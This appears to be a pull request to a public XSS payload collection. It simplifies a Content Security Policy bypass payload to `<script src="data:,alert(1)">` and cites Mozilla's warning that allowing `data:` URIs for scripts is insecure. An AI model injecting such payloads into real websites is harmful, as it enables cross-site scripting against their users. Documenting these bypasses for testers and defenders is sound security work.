### PR TITLE
XSS: Remove unnecessary complexity from CSP bypass payload

### DIFF
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -1072,10 +1072,10 @@ Works for CSP like `script-src self`
 
 ### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
 
-Works for CSP like `script-src 'self' data:`
+Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
 
 ```javascript
-<script ?/src="data:+,\u0061lert%281%29">/</script>
+<script src="data:,alert(1)">/</script>
 ```
 
 


### PR DESCRIPTION
Hi, i recently came accross the payload for CSP bypasses using the scheme-src `data`. I think that the current payload is unnecessary complex in regards of the actuall issue of the vulnerable CSP. Therefore i would propose to change the payload to the most bare needed complexity and add the mozzilla documentation to it, where the issue is also stated:

```
<scheme-source>
    data: Allows data: URIs to be used as a content source. This is insecure; an attacker can also inject arbitrary data: URIs. Use this sparingly and definitely not for scripts.
```